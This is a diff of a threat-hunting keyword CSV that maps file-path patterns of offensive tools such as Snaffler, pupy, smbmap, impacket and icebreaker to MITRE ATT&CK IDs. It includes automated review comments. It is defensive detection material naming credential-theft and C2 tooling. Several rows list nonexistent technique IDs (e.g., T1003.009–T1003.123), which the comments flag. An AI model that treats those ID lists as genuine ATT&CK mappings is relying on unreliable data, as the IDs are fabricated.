Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/smbmap.git*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*/smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
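Review bot: The refreshed `monkey` row for `*/smbexec.py*` still writes its techniques as `T1587 T1570 T1021 T1072 T1550`, space-separated and with tactics `N/A`, while every other row in this hunk joins IDs with ` - `. A consumer that splits `metadata_tool_techniques` on that delimiter would presumably read the field as one unknown ID. I would write it as `"T1587 - T1570 - T1021 - T1072 - T1550"`. The row directly above attributes the same keyword to `crackmapexec`, so a hit on `*/smbexec.py*` cannot name a single tool. The `metadata_comment` column, `N/A` on both rows, is a natural place to record that the filename is shared and the attribution ambiguous.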
@@ -5329,7 +5386,7 @@ "*/smbserver/smb_server.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*/smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-signing-disabled-hosts.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/smbspider.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/SMBSR.git*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*/smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" 
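Review bot: The `pupy` row for `*/smbspider.py*` carries technique IDs that, as far as I can tell, MITRE ATT&CK does not define: `T1071.006` through `T1071.018`, `T1573.003` through `T1573.005`, `T1064.001` and `T1105.002`. They read like a generated numeric run rather than a mapping. The four Snaffler rows in the next hunk (`@@ -5360,13 +5417,13 @@`) have the same problem on a larger scale, listing `T1003.001` through `T1003.123` where T1003 has only sub-techniques `.001` to `.008`. Any alert enrichment or ATT&CK coverage report fed from this column will count techniques that do not exist. Since the commit rewrites these rows anyway, I would trim each list to IDs that resolve, for Snaffler perhaps `"T1083 - T1135 - T1552.001"` (to be confirmed by the maintainers), and add a validation step that rejects IDs missing from the ATT&CK dataset.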
@@ -5360,13 +5417,13 @@ "*/smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" -"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - 
T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - 
T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - 
T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - 
T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - 
T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - 
T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - 
T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - 
T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "*/SnaffPoint.git*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/sniffer.git*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" 